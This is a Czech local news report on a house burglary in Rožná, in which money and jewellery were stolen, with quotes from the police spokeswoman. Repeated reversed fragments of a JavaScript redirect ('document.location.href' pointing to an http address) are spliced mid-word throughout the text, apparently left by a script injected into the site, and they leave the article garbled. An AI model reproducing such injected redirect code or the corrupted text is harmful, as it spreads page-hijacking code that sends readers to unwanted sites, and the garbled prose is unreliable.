Rainbow page separator

Z domu během pouhých dvou hodin zmizely peníze i šperky

Pátek, 10. listopadu 2017

Policejní auto, policie, měření rychlosti

Rožná / Po dosud neznámém zloději, který se v pátek 3. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu mezi půl devá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou a půl jedenác[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou hodinou dopolední vloupal do jednoho z rodinných domů v obci Rožná, pátrají bystřičtí policisté.
„Pachatel vnikl do vnitřních pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torů domu, které prohledal, a v jedné z místností odcizil finanční ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovost a šperky. Majiteli tak způsobil škodu kolem třiadvaceti tisíc korun,“ popsala policejní mluvčí Stanislava Miláčková.
Přivolaní policisté mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to činu ohledali, provedli šetření a vše zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali. V případu zahájili úkony trestního řízení pro podezření ze spáchání přečinů porušování domovní svobody a krádeže.
„Případ policisté nadále prověřují a po pachateli pátrají. Za takový trestný činu mu hrozí trest odnětí svobody až na dva roky,“ poznamenala mluvčí.